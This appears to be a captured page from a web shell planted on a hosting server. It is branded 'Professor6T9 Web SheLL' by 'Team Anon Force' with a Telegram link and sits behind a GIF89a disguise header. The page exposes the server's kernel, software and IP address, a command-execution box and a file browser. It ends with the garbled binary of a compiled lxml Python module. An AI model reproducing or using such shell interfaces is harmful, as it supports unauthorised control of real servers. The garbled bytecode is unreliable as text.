GIF89;aGIF89;aGIF89;a
Team Anon Force
https://t.me/Professor6T9x
Professor6T9 Web SheLL
Linux premium264.web-hosting.com 4.18.0-553.45.1.lve.el8.x86_64 #1 SMP Wed Mar 26 12:08:09 UTC 2025 x86_64
LiteSpeed
69.57.162.12
/
opt
/
cloudlinux
/
venv
/
lib
/
python3.11
/
site-packages
/
lxml
/
html
/
__pycache__
[ HOME ]
Exec
Submit
File Name : _html5builder.cpython-311.pyc
� � h� � � � d Z ddlmZmZ ddlmZmZ G d� de� � Z G d� de� � Z G d� d ej � � Z d S )z� Legacy module - don't use in new code! html5lib now has its own proper implementation. This module implements a tree builder for html5lib that generates lxml html element trees. This module uses camelCase as it follows the html5lib style guide. � )�_base�etree)�htmlr c � � e Zd Zd� ZdS )�DocumentTypec �0 � || _ || _ || _ d S �N)�name�publicId�systemId)�selfr r r s �j/builddir/build/BUILD/cloudlinux-venv-1.0.8/venv/lib64/python3.11/site-packages/lxml/html/_html5builder.py�__init__zDocumentType.__init__ s � ��� � �� � �� � � � N)�__name__� __module__�__qualname__r � r r r r s# � � � � � �!� !� !� !� !r r c � � e Zd Zd� Zd� ZdS )�Documentc �"